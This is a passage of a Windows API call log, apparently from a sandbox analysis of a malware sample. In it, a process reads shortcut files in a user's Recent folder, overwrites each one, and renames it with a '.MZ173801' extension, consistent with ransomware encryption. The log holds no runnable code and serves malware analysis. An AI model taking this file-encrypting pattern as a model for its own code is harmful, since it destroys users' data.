lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.043] GetCurrentThreadId () returned 0x1358 [0112.043] GetCurrentThreadId () returned 0x1358 [0112.043] GetCurrentThreadId () returned 0x1358 [0112.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.044] GetCurrentThreadId () returned 0x1358 [0112.044] GetCurrentThreadId () returned 0x1358 [0112.044] GetCurrentThreadId () returned 0x1358 [0112.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v4vV8.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\v4vv8.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.044] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.044] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.044] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x495 [0112.044] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.044] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x495, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x495, lpOverlapped=0x0) returned 1 [0112.045] CloseHandle (hObject=0x3f4) returned 1 [0112.045] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v4vV8.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\v4vv8.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.046] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x495, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x495, lpOverlapped=0x0) returned 1 [0112.047] CloseHandle (hObject=0x3f4) returned 1 [0112.048] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v4vV8.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\v4vv8.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v4vV8.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\v4vv8.lnk.mz173801")) returned 1 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] GetCurrentThreadId () returned 0x1358 [0112.049] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c69ae59, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c69ae59, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c69ae59, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Vh7qZ.lnk", cAlternateFileName="")) returned 1 [0112.049] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.049] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.050] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vh7qZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vh7qz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c69ae59, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9c69ae59, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9c69ae59, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7)) returned 1 [0112.050] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.050] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.050] GetCurrentThreadId () returned 0x1358 [0112.050] GetCurrentThreadId () returned 0x1358 [0112.050] GetCurrentThreadId () returned 0x1358 [0112.051] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.051] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.051] GetCurrentThreadId () returned 0x1358 [0112.051] GetCurrentThreadId () returned 0x1358 [0112.051] GetCurrentThreadId () returned 0x1358 [0112.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vh7qZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vh7qz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.051] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.051] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.051] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4a7 [0112.051] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.052] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4a7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4a7, lpOverlapped=0x0) returned 1 [0112.052] CloseHandle (hObject=0x3f4) returned 1 [0112.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vh7qZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vh7qz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.053] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x4a7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4a7, lpOverlapped=0x0) returned 1 [0112.054] CloseHandle (hObject=0x3f4) returned 1 [0112.055] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vh7qZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vh7qz.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Vh7qZ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vh7qz.lnk.mz173801")) returned 1 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] GetCurrentThreadId () returned 0x1358 [0112.056] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x75781b53, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75781b53, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Videos.lnk", cAlternateFileName="")) returned 1 [0112.056] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.056] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.056] GetFileAttributesExW (in: 